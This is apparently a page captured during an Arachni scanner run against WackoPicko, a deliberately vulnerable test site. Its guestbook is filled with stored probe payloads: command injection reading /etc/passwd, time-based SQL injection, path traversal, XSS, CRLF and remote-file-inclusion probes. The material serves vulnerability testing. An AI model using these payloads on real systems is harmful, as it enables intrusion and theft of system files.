	<p> - by &quot;;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()&quot;// </p>
		<p class="comment">";window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();"</p>
	<p> - by arachni_name </p>
		<p class="comment">";window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()"</p>
	<p> - by arachni_name </p>
		<p class="comment">1</p>
	<p> - by &quot;;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();&quot;// </p>
		<p class="comment">1</p>
	<p> - by ;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()// </p>
		<p class="comment">1</p>
	<p> - by ;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink() </p>
		<p class="comment">';window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()'</p>
	<p> - by arachni_name </p>
		<p class="comment">javascript:window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()//</p>
	<p> - by arachni_name </p>
		<p class="comment">1</p>
	<p> - by tests.arachni-scanner.com/rfi.md5.txt </p>
		<p class="comment">http://tests.arachni-scanner.com/rfi.md5.txt</p>
	<p> - by arachni_name </p>
		<p class="comment">1</p>
	<p> - by arachni_nametests.arachni-scanner.com/rfi.md5.txt </p>
		<p class="comment">1tests.arachni-scanner.com/rfi.md5.txt</p>
	<p> - by arachni_name </p>
		<p class="comment">1</p>
	<p> - by arachni_namehttp://tests.arachni-scanner.com/rfi.md5.txt </p>
		<p class="comment">1</p>
	<p> - by arachni_namehttp://tests.arachni-scanner.com/rfi.md5.txt </p>
		<p class="comment">1</p>
	<p> - by arachni_nametests.arachni-scanner.com/rfi.md5.txt </p>
		<p class="comment">1</p>
	<p> - by tests.arachni-scanner.com/rfi.md5.txt </p>
		<p class="comment">1tests.arachni-scanner.com/rfi.md5.txt</p>
	<p> - by arachni_name </p>
		<p class="comment">tests.arachni-scanner.com/rfi.md5.txt</p>
	<p> - by arachni_name </p>
		<p class="comment">1</p>
	<p> - by javascript:window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()// </p>
		<p class="comment">http://tests.arachni-scanner.com/rfi.md5.txt</p>
	<p> - by arachni_name </p>
		<p class="comment">1</p>
	<p> - by ';window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()' </p>
		<p class="comment">1http://tests.arachni-scanner.com/rfi.md5.txt</p>
	<p> - by arachni_name </p>
		<p class="comment">1http://tests.arachni-scanner.com/rfi.md5.txt</p>
	<p> - by arachni_name </p>
		<p class="comment">tests.arachni-scanner.com/rfi.md5.txt</p>
	<p> - by arachni_name </p>
		<p class="comment">1</p>
	<p> - by http://tests.arachni-scanner.com/rfi.md5.txt </p>
		<p class="comment">1</p>
	<p> - by http://tests.arachni-scanner.com/rfi.md5.txt </p>
		<p class="comment">";window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();"//</p>
	<p> - by arachni_name </p>
		<p class="comment">1</p>
	<p> - by */;
window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()/* </p>
		<p class="comment">',x:window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink(),y:'</p>
	<p> - by arachni_name </p>
		<p class="comment">1</p>
	<p> - by &lt;/script&gt;&lt;script&gt;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()&lt;/script&gt; </p>
		<p class="comment">1;
window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()//</p>
	<p> - by arachni_name </p>
		<p class="comment">1</p>
	<p> - by &quot;,x:window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink(),y:&quot; </p>
		<p class="comment">1</p>
	<p> - by ',x:window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink(),y:' </p>
		<p class="comment"></script>
<script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript -->
<script>

                // Injected by Arachni::Browser::Javascript
                _arachni_js_namespaceTaintTracer.update_tracers();
                _arachni_js_namespaceDOMMonitor.update_trackers();

window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()</script>
<script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript -->
</p>
	<p> - by arachni_name </p>
		<p class="comment">1;
window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();</p>
	<p> - by arachni_name </p>
		<p class="comment">1</p>
	<p> - by window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink() </p>
		<p class="comment">",x:window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink(),y:"</p>
	<p> - by arachni_name </p>
		<p class="comment">1'"</p>
	<p> - by arachni_name </p>
		<p class="comment">1</p>
	<p> - by arachni_name]]]]]]]]] </p>
		<p class="comment">1]]]]]]]]]</p>
	<p> - by arachni_name </p>
		<p class="comment">1<!--</p>
	<p> - by arachni_name </p>
		<p class="comment">1</p>
	<p> - by arachni_name#^($!@$)(()))****** </p>
		<p class="comment">1</p>
	<p> - by arachni_name'&quot; </p>
		<p class="comment">1</p>
	<p> - by arachni_name&lt;!-- </p>
		<p class="comment">1#^($!@$)(()))******</p>
	<p> - by arachni_name </p>
		<p class="comment">window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()</p>
	<p> - by arachni_name </p>
		<p class="comment">1</p>
	<p> - by 1;
window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();// </p>
		<p class="comment">1;
window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();//</p>
	<p> - by arachni_name </p>
		<p class="comment">1</p>
	<p> - by 1;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink(); </p>
		<p class="comment">1;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()//</p>
	<p> - by arachni_name </p>
		<p class="comment">1;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()</p>
	<p> - by arachni_name </p>
		<p class="comment">1;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();//</p>
	<p> - by arachni_name </p>
		<p class="comment">;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();</p>
	<p> - by arachni_name </p>
		<p class="comment">1</p>
	<p> - by ;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink(); </p>
		<p class="comment">1</p>
	<p> - by &quot;;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()&quot; </p>
		<p class="comment">1</p>
	<p> - by 1;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink() </p>
		<p class="comment">1</p>
	<p> - by ;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();// </p>
		<p class="comment">1</p>
	<p> - by 1;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()// </p>
		<p class="comment">1</p>
	<p> - by 1;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();// </p>
		<p class="comment">*/;
window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()/*</p>
	<p> - by arachni_name </p>
		<p class="comment">1;
window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()</p>
	<p> - by arachni_name </p>
		<p class="comment">1;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();</p>
	<p> - by arachni_name </p>
		<p class="comment">1</p>
	<p> - by 1;
window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink(); </p>
		<p class="comment">;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();//</p>
	<p> - by arachni_name </p>
		<p class="comment">1</p>
	<p> - by 1;
window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink() </p>
		<p class="comment">1</p>
	<p> - by 1;
window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()// </p>
		<p class="comment">1</p>
	<p> - by arachni_name
X-CRLF-Safe-ca890a60d2e09a1de6dc78b0f4d0f8ec: no </p>
		<p class="comment">1</p>
	<p> - by 
X-CRLF-Safe-ca890a60d2e09a1de6dc78b0f4d0f8ec: no </p>
		<p class="comment">_arachni_trainer_ca890a60d2e09a1de6dc78b0f4d0f8ec</p>
	<p> - by arachni_name </p>
		<p class="comment">1</p>
	<p> - by _arachni_trainer_ca890a60d2e09a1de6dc78b0f4d0f8ec </p>
		<p class="comment">1</p>
	<p> - by arachni_name_arachni_trainer_ca890a60d2e09a1de6dc78b0f4d0f8ec </p>
		<p class="comment">1
X-CRLF-Safe-ca890a60d2e09a1de6dc78b0f4d0f8ec: no</p>
	<p> - by arachni_name </p>
		<p class="comment">1</p>
	<p> - by arachni_name_arachni_trainer_ca890a60d2e09a1de6dc78b0f4d0f8ec </p>
		<p class="comment">1</p>
	<p> - by 
X-CRLF-Safe-ca890a60d2e09a1de6dc78b0f4d0f8ec: no </p>
		<p class="comment">
X-CRLF-Safe-ca890a60d2e09a1de6dc78b0f4d0f8ec: no</p>
	<p> - by arachni_name </p>
		<p class="comment">1</p>
	<p> - by arachni_name
X-CRLF-Safe-ca890a60d2e09a1de6dc78b0f4d0f8ec: no </p>
		<p class="comment">1
X-CRLF-Safe-ca890a60d2e09a1de6dc78b0f4d0f8ec: no</p>
	<p> - by arachni_name </p>
		<p class="comment">
X-CRLF-Safe-ca890a60d2e09a1de6dc78b0f4d0f8ec: no</p>
	<p> - by arachni_name </p>
		<p class="comment">hTtP://tests.arachni-scanner.com/rfi.md5.txt</p>
	<p> - by arachni_name </p>
		<p class="comment">hTtP://tests.arachni-scanner.com/rfi.md5.txt</p>
	<p> - by arachni_name </p>
		<p class="comment">1</p>
	<p> - by arachni_namehTtP://tests.arachni-scanner.com/rfi.md5.txt </p>
		<p class="comment">1</p>
	<p> - by hTtP://tests.arachni-scanner.com/rfi.md5.txt </p>
		<p class="comment">1</p>
	<p> - by _arachni_trainer_ca890a60d2e09a1de6dc78b0f4d0f8ec </p>
		<p class="comment">1</p>
	<p> - by arachni_name </p>
		<p class="comment">1</p>
	<p> - by arachni_namehTtP://tests.arachni-scanner.com/rfi.md5.txt </p>
		<p class="comment">_arachni_trainer_ca890a60d2e09a1de6dc78b0f4d0f8ec</p>
	<p> - by arachni_name </p>
		<p class="comment">1hTtP://tests.arachni-scanner.com/rfi.md5.txt</p>
	<p> - by arachni_name </p>
		<p class="comment">1</p>
	<p> - by hTtP://tests.arachni-scanner.com/rfi.md5.txt </p>
		<p class="comment">1_arachni_trainer_ca890a60d2e09a1de6dc78b0f4d0f8ec</p>
	<p> - by arachni_name </p>
		<p class="comment">1hTtP://tests.arachni-scanner.com/rfi.md5.txt</p>
	<p> - by arachni_name </p>
		<p class="comment">1_arachni_trainer_ca890a60d2e09a1de6dc78b0f4d0f8ec</p>
	<p> - by arachni_name </p>
		<p class="comment">Hi, I love your site!</p>
	<p> - by adam </p>
	



<form action="/WackoPicko/guestbook.php" method="POST">
   Name: <br>
   <input type="text" name="name" /><br>
   Comment: <br>
   <textarea id="comment-box" name="comment"></textarea> <br>
   <input type="submit" value="Submit" />
</form>


</div>
       <div class="column span-24 first last" id="footer" >
	<ul>
	  <li><a href="/WackoPicko/">Home</a> |</li>
          <li><a href="/WackoPicko/admin/index.php?page=login">Admin</a> |</li>
	  <li><a href="mailto:contact@wackopicko.com">Contact</a> |</li>
	  <li><a href="/WackoPicko/tos.php">Terms of Service</a></li>
	</ul>
      </div>
    </div>
  </body>
</html>  
   
Browser-evaluated body

This is the browser-evaluated body, as a result of the listed transitions.

0
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
497
498
499
500
501
502
503
504
505
506
507
508
509
510
511
512
513
514
515
516
517
518
519
520
521
522
523
524
525
526
527
528
529
530
531
532
533
534
535
536
537
538
539
540
541
542
543
544
545
546
547
548
549
550
551
552
553
554
555
556
557
558
559
560
561
562
563
564
565
566
567
568
569
570
571
572
573
574
575
576
577
578
579
580
581
582
583
584
585
586
587
588
589
590
591
592
593
594
595
596
597
598
599
600
601
602
603
604
605
606
607
608
609
610
611
612
613
614
615
616
617
618
619
620
621
622
623
624
625
626
627
628
629
630
631
632
633
634
635
636
637
638
639
640
641
642
643
644
645
646
647
648
649
650
651
652
653
654
655
656
657
658
659
660
661
662
663
664
665
666
667
668
669
670
671
672
673
674
675
676
677
678
679
680
681
682
683
684
685
686
687
688
689
690
691
692
693
694
695
696
697
698
699
700
701
702
703
704
705
706
707
708
709
710
711
712
713
714
715
716
717
718
719
720
721
722
723
724
725
726
727
728
729
730
731
732
733
734
735
736
737
738
739
740
741
742
743
744
745
746
747
748
749
750
751
752
753
754
755
756
757
758
759
760
761
762
763
764
765
766
767
768
769
770
771
772
773
774
775
776
777
778
779
780
781
782
783
784
785
786
787
788
789
790
791
792
793
794
795
796
797
798
799
800
801
802
803
804
805
806
807
808
809
810
811
812
813
814
815
816
817
818
819
820
821
822
823
824
825
826
827
828
829
830
831
832
833
834
835
836
837
838
839
840
841
842
843
844
845
846
847
848
849
850
851
852
853
854
855
856
857
858
859
860
861
862
863
864
865
866
867
868
869
870
871
872
873
874
875
876
877
878
879
880
881
882
883
884
885
886
887
888
889
890
891
892
893
894
895
896
897
898
899
900
901
902
903
904
905
906
907
908
909
910
911
912
913
914
915
916
917
918
919
920
921
922
923
924
925
926
927
928
929
930
931
932
933
934
935
936
937
938
939
940
941
942
943
944
945
946
947
948
949
950
951
952
953
954
955
956
957
958
959
960
961
962
963
964
965
966
967
968
969
970
971
972
973
974
975
976
977
978
979
980
981
982
983
984
985
986
987
988
989
990
991
992
993
994
995
996
997
998
999
1000
1001
1002
1003
1004
1005
1006
1007
1008
1009
1010
1011
1012
1013
1014
1015
1016
1017
1018
1019
1020
1021
1022
1023
1024
1025
1026
1027
1028
<html><head><script src="http://javascript.browser.arachni/polyfills.js"></script> <!-- Injected by Arachni::Browser::Javascript -->
<script src="http://javascript.browser.arachni/taint_tracer.js"></script> <!-- Injected by Arachni::Browser::Javascript -->
<script src="http://javascript.browser.arachni/dom_monitor.js"></script> <!-- Injected by Arachni::Browser::Javascript -->
<script>
/* arachni_js_namespace_initialize_start */ _arachni_js_namespaceTaintTracer.initialize({"<xss_ca890a60d2e09a1de6dc78b0f4d0f8ec/>":{"stop_at_first":false,"trace":true},"PHPSESSID":{"stop_at_first":true,"trace":false},"decslc8vmakk398sqkq9619t72":{"stop_at_first":true,"trace":false}}) /* arachni_js_namespace_initialize_stop */
window._arachni_js_namespace = true;

/* arachni_js_namespace_code_start */  /* arachni_js_namespace_code_stop */
</script> <!-- Injected by Arachni::Browser::Javascript -->


  
    <link rel="stylesheet" href="/WackoPicko/css/blueprint/screen.css" type="text/css" media="screen, projection">
    <link rel="stylesheet" href="/WackoPicko/css/blueprint/print.css" type="text/css" media="print"> 
    <!--[if IE]><link rel="stylesheet" href="/WackoPicko/css/blueprint/ie.css" type="text/css" media="screen, projection"><![endif]-->
    <link rel="stylesheet" href="/WackoPicko/css/stylings.php" type="text/css" media="screen">
    <title>WackoPicko.com</title>
  </head>
  <body>
    <div class="container " style="border: 2px solid #5c95cf;">
      <div class="column span-24 first last">
        <h1 id="title"><a href="/WackoPicko/">WackoPicko.com</a></h1>
      </div>
      <div id="menu">
        <div class="column prepend-1 span-14 first">
          <ul class="menu">
            <li class=""><a href="/WackoPicko/users/home.php"><span>Home</span></a></li>
            <li class=""><a href="/WackoPicko/pictures/upload.php"><span>Upload</span></a></li>
            <li class=""><a href="/WackoPicko/pictures/recent.php"><span>Recent</span></a></li>
            <li class="current"><a href="/WackoPicko/guestbook.php"><span>Guestbook</span></a></li>
      
                </ul>
        </div>
        <div class="column prepend-1 span-7 first last">
          <ul class="menu top_login">
                  <li><a href="/WackoPicko/users/login.php"><span>Login</span></a></li>
                </ul>
        </div>
      </div>
      
      
      
      <div class="column span-24 first last" id="search_bar_blue">
        <div class="column prepend-17 span-7 first last" id="search_box">
          <form action="/WackoPicko/pictures/search.php" method="get" style="display:inline;">
            <input id="query2" name="query" size="15" style="padding: 2px; font-size: 16px; text-decoration:none;border:none;vertical-align:middle;" type="text" value="">
            <input src="/WackoPicko/images/search_button_white.gif" type="image" style="border: 0pt none ; position: relative; top: 0px;vertical-align:middle;margin-left: 1em;">
          </form>
        </div>
      </div>
   
<div class="column prepend-1 span-24 first last">
<h2>Guestbook</h2>
<h4>See what people are saying about us!</h4>

        <p class="comment">1</p>
        <p> - by " | /bin/cat /etc/passwd | " </p>
                <p class="comment">" ; /bin/cat /etc/passwd ; "</p>
        <p> - by arachni_name </p>
                <p class="comment">1</p>
        <p> - by  | /bin/cat /etc/passwd |  </p>
                <p class="comment">1</p>
        <p> - by  ; /bin/cat /etc/passwd ;  </p>
                <p class="comment">` /bin/cat /etc/passwd`</p>
        <p> - by arachni_name </p>
                <p class="comment">" &amp;&amp; /bin/cat /etc/passwd &amp;&amp; "</p>
        <p> - by arachni_name </p>
                <p class="comment">1</p>
        <p> - by ' &amp;&amp; /bin/cat /etc/passwd &amp;&amp; ' </p>
                <p class="comment">1</p>
        <p> - by " ; /bin/cat /etc/passwd ; " </p>
                <p class="comment">" | /bin/cat /etc/passwd | "</p>
        <p> - by arachni_name </p>
                <p class="comment">1</p>
        <p> - by ' | /bin/cat /etc/passwd | ' </p>
                <p class="comment">1</p>
        <p> - by " &amp;&amp; /bin/cat /etc/passwd &amp;&amp; " </p>
                <p class="comment">1</p>
        <p> - by ` /bin/cat /etc/passwd` </p>
                <p class="comment">' | /bin/cat /etc/passwd | '</p>
        <p> - by arachni_name </p>
                <p class="comment">1</p>
        <p> - by ";print 28763*4196403# </p>
                <p class="comment">print 28763*4196403;</p>
        <p> - by arachni_name </p>
                <p class="comment">1</p>
        <p> - by ';print 28763*4196403# </p>
                <p class="comment">';print 28763*4196403#</p>
        <p> - by arachni_name </p>
                <p class="comment">print 28763*4196403</p>
        <p> - by arachni_name </p>
                <p class="comment">;print 28763*4196403</p>
        <p> - by arachni_name </p>
                <p class="comment">1</p>
        <p> - by print 28763*4196403 </p>
                <p class="comment">/search.php.</p>
        <p> - by arachni_name </p>
                <p class="comment">1</p>
        <p> - by print 28763*4196403; </p>
                <p class="comment">1</p>
        <p> - by ;print 28763*4196403 </p>
                <p class="comment">1</p>
        <p> - by arachni_name';.") </p>
                <p class="comment">1</p>
        <p> - by arachni_name';waitfor delay '0:0:4'--  </p>
                <p class="comment">1</p>
        <p> - by arachni_name' where sleep(4) #  </p>
                <p class="comment">1</p>
        <p> - by ";print 28763*4196403;# </p>
                <p class="comment">;print 28763*4196403;</p>
        <p> - by arachni_name </p>
                <p class="comment">";print 28763*4196403;#</p>
        <p> - by arachni_name </p>
                <p class="comment">1</p>
        <p> - by ;print 28763*4196403; </p>
                <p class="comment">1</p>
        <p> - by ';print 28763*4196403;# </p>
                <p class="comment">";print 28763*4196403#</p>
        <p> - by arachni_name </p>
                <p class="comment">';print 28763*4196403;#</p>
        <p> - by arachni_name </p>
                <p class="comment">1</p>
        <p> - by /search.php. </p>
                <p class="comment">1</p>
        <p> - by /bin/cat /etc/passwd </p>
                <p class="comment">1</p>
        <p> - by  &amp;&amp; /bin/cat /etc/passwd &amp;&amp;  </p>
                <p class="comment">1</p>
        <p> - by /WackoPicko/pictures/search.php. </p>
                <p class="comment">' ; /bin/cat /etc/passwd ; '</p>
        <p> - by arachni_name </p>
                <p class="comment">' &amp;&amp; /bin/cat /etc/passwd &amp;&amp; '</p>
        <p> - by arachni_name </p>
                <p class="comment">1</p>
        <p> - by ' ; /bin/cat /etc/passwd ; ' </p>
                <p class="comment"> ; /bin/cat /etc/passwd ; </p>
        <p> - by arachni_name </p>
                <p class="comment">1</p>
        <p> - by /pictures/search.php </p>
                <p class="comment">/bin/cat /etc/passwd</p>
        <p> - by arachni_name </p>
                <p class="comment"> &amp;&amp; /bin/cat /etc/passwd &amp;&amp; </p>
        <p> - by arachni_name </p>
                <p class="comment">/pictures/search.php.</p>
        <p> - by arachni_name </p>
                <p class="comment">/WackoPicko/pictures/search.php.</p>
        <p> - by arachni_name </p>
                <p class="comment">1</p>
        <p> - by /pictures/search.php. </p>
                <p class="comment">/pictures/search.php</p>
        <p> - by arachni_name </p>
                <p class="comment">/WackoPicko/pictures/search.php</p>
        <p> - by arachni_name </p>
                <p class="comment">1</p>
        <p> - by /search.php </p>
                <p class="comment">1</p>
        <p> - by /WackoPicko/pictures/search.php </p>
                <p class="comment"> | /bin/cat /etc/passwd | </p>
        <p> - by arachni_name </p>
                <p class="comment">/search.php</p>
        <p> - by arachni_name </p>
                <p class="comment">1'=sleep(4)='</p>
        <p> - by arachni_name </p>
                <p class="comment">1;waitfor delay '0:0:4'-- </p>
        <p> - by arachni_name </p>
                <p class="comment">1</p>
        <p> - by arachni_name');select pg_sleep(4); --  </p>
                <p class="comment">1;select pg_sleep(4); -- </p>
        <p> - by arachni_name </p>
                <p class="comment">1);waitfor delay '0:0:4'-- </p>
        <p> - by arachni_name </p>
                <p class="comment">1');waitfor delay '0:0:4'-- </p>
        <p> - by arachni_name </p>
                <p class="comment">1</p>
        <p> - by arachni_name));select pg_sleep(4); --  </p>
                <p class="comment">1" or sleep(4) # </p>
        <p> - by arachni_name </p>
                <p class="comment">1';select pg_sleep(4); -- </p>
        <p> - by arachni_name </p>
                <p class="comment">1</p>
        <p> - by arachni_name;waitfor delay '0:0:4'--  </p>
                <p class="comment">1</p>
        <p> - by arachni_name'=sleep(4)=' </p>
                <p class="comment">1"=sleep(4)="</p>
        <p> - by arachni_name </p>
                <p class="comment">1'));select pg_sleep(4); -- </p>
        <p> - by arachni_name </p>
                <p class="comment">1</p>
        <p> - by arachni_name'));select pg_sleep(4); --  </p>
                <p class="comment">1</p>
        <p> - by arachni_name"=sleep(4)=" </p>
                <p class="comment">1</p>
        <p> - by arachni_name';select pg_sleep(4); --  </p>
                <p class="comment">1</p>
        <p> - by arachni_name);waitfor delay '0:0:4'--  </p>
                <p class="comment">1</p>
        <p> - by arachni_name));waitfor delay '0:0:4'--  </p>
                <p class="comment">1';.")</p>
        <p> - by arachni_name </p>
                <p class="comment">1</p>
        <p> - by arachni_name");waitfor delay '0:0:4'--  </p>
                <p class="comment">1"));waitfor delay '0:0:4'-- </p>
        <p> - by arachni_name </p>
                <p class="comment">1</p>
        <p> - by arachni_name);select pg_sleep(4); --  </p>
                <p class="comment">1';waitfor delay '0:0:4'-- </p>
        <p> - by arachni_name </p>
                <p class="comment">1' and sleep(4) # </p>
        <p> - by arachni_name </p>
                <p class="comment">1");waitfor delay '0:0:4'-- </p>
        <p> - by arachni_name </p>
                <p class="comment">1";waitfor delay '0:0:4'-- </p>
        <p> - by arachni_name </p>
                <p class="comment">1'));waitfor delay '0:0:4'-- </p>
        <p> - by arachni_name </p>
                <p class="comment">1</p>
        <p> - by arachni_name"));waitfor delay '0:0:4'--  </p>
                <p class="comment">1</p>
        <p> - by arachni_name'));waitfor delay '0:0:4'--  </p>
                <p class="comment">1</p>
        <p> - by arachni_name";waitfor delay '0:0:4'--  </p>
                <p class="comment">1</p>
        <p> - by arachni_name');waitfor delay '0:0:4'--  </p>
                <p class="comment">1));select pg_sleep(4); -- </p>
        <p> - by arachni_name </p>
                <p class="comment">1));waitfor delay '0:0:4'-- </p>
        <p> - by arachni_name </p>
                <p class="comment">1</p>
        <p> - by arachni_name' or sleep(4) #  </p>
                <p class="comment">1</p>
        <p> - by arachni_name" and sleep(4)=" </p>
                <p class="comment">1' or sleep(4) # </p>
        <p> - by arachni_name </p>
                <p class="comment">1</p>
        <p> - by arachni_name or sleep(4) #  </p>
                <p class="comment">1</p>
        <p> - by arachni_name' and sleep(4) #  </p>
                <p class="comment">1</p>
        <p> - by arachni_name' and sleep(4)=' </p>
                <p class="comment">1' and sleep(4)='</p>
        <p> - by arachni_name </p>
                <p class="comment">1 or sleep(4) # </p>
        <p> - by arachni_name </p>
                <p class="comment">1</p>
        <p> - by arachni_name" or sleep(4) #  </p>
                <p class="comment">1" and sleep(4)="</p>
        <p> - by arachni_name </p>
                <p class="comment">1</p>
        <p> - by arachni_name and sleep(4) </p>
                <p class="comment">1</p>
        <p> - by arachni_name;select pg_sleep(4); --  </p>
                <p class="comment">1');select pg_sleep(4); -- </p>
        <p> - by arachni_name </p>
                <p class="comment">1' where sleep(4) # </p>
        <p> - by arachni_name </p>
                <p class="comment">1);select pg_sleep(4); -- </p>
        <p> - by arachni_name </p>
                <p class="comment">1 and sleep(4)</p>
        <p> - by arachni_name </p>
                <p class="comment">file:///../../../../../../..//etc/passwd.</p>
        <p> - by arachni_name </p>
                <p class="comment">1</p>
        <p> - by file:///../../../../../../../..//etc/passwd </p>
                <p class="comment">file:///../../../../../../../../..//etc/passwd</p>
        <p> - by arachni_name </p>
                <p class="comment">1</p>
        <p> - by /../../../../../../../..//etc/passwd </p>
                <p class="comment">/../../../../../../../../..//etc/passwd</p>
        <p> - by arachni_name </p>
                <p class="comment">file:///../../../../../../../../..//etc/passwd.</p>
        <p> - by arachni_name </p>
                <p class="comment">1</p>
        <p> - by file:///../../../../../../../..//etc/passwd. </p>
                <p class="comment">1</p>
        <p> - by file:///../../../../../../../../..//etc/passwd. </p>
                <p class="comment">1</p>
        <p> - by file:///../../../../../../..//etc/passwd. </p>
                <p class="comment">/../../../../../../..//etc/passwd</p>
        <p> - by arachni_name </p>
                <p class="comment">/../../../../../../..//etc/passwd.</p>
        <p> - by arachni_name </p>
                <p class="comment">1</p>
        <p> - by /../../../../..//etc/passwd </p>
                <p class="comment">1</p>
        <p> - by /../../../../../..//etc/passwd </p>
                <p class="comment">1</p>
        <p> - by /../../../../../../..//etc/passwd. </p>
                <p class="comment">/../../../../..//etc/passwd</p>
        <p> - by arachni_name </p>
                <p class="comment">file:///../../../../../..//etc/passwd.</p>
        <p> - by arachni_name </p>
                <p class="comment">file:///../../../../..//etc/passwd</p>
        <p> - by arachni_name </p>
                <p class="comment">file:///../../../../..//etc/passwd.</p>
        <p> - by arachni_name </p>
                <p class="comment">1</p>
        <p> - by file:///../../../..//etc/passwd. </p>
                <p class="comment">/../../../../../..//etc/passwd.</p>
        <p> - by arachni_name </p>
                <p class="comment">file:///../../../..//etc/passwd</p>
        <p> - by arachni_name </p>
                <p class="comment">/../../../../../..//etc/passwd</p>
        <p> - by arachni_name </p>
                <p class="comment">/../../../../..//etc/passwd.</p>
        <p> - by arachni_name </p>
                <p class="comment">1</p>
        <p> - by file:///../../../../..//etc/passwd. </p>
                <p class="comment">1</p>
        <p> - by file:///../../../..//etc/passwd </p>
                <p class="comment">1</p>
        <p> - by file:///../../../../..//etc/passwd </p>
                <p class="comment">1</p>
        <p> - by file:///../../../../../..//etc/passwd. </p>
                <p class="comment">file:///../../../..//etc/passwd.</p>
        <p> - by arachni_name </p>
                <p class="comment">1</p>
        <p> - by /../../../../../../..//etc/passwd </p>
                <p class="comment">1</p>
        <p> - by /../../../..//etc/passwd. </p>
                <p class="comment">/../../../../../../../../..//etc/passwd.</p>
        <p> - by arachni_name </p>
                <p class="comment">1</p>
        <p> - by file:///../../../../../../../../..//etc/passwd </p>
                <p class="comment">/../../../../../../../..//etc/passwd.</p>
        <p> - by arachni_name </p>
                <p class="comment">file:///../../../../../../../..//etc/passwd</p>
        <p> - by arachni_name </p>
                <p class="comment">1</p>
        <p> - by file:///../../../../../..//etc/passwd </p>
                <p class="comment">file:///../../../../../../../..//etc/passwd.</p>
        <p> - by arachni_name </p>
                <p class="comment">1</p>
        <p> - by /../../../..//etc/passwd </p>
                <p class="comment">1</p>
        <p> - by /../../../../../../../../..//etc/passwd. </p>
                <p class="comment">1</p>
        <p> - by /../../../../..//etc/passwd. </p>
                <p class="comment">1</p>
        <p> - by file:///../../../../../../..//etc/passwd </p>
                <p class="comment">1</p>
        <p> - by /../../../../../../../..//etc/passwd. </p>
                <p class="comment">1</p>
        <p> - by /../../../../../..//etc/passwd. </p>
                <p class="comment">/../../../../../../../..//etc/passwd</p>
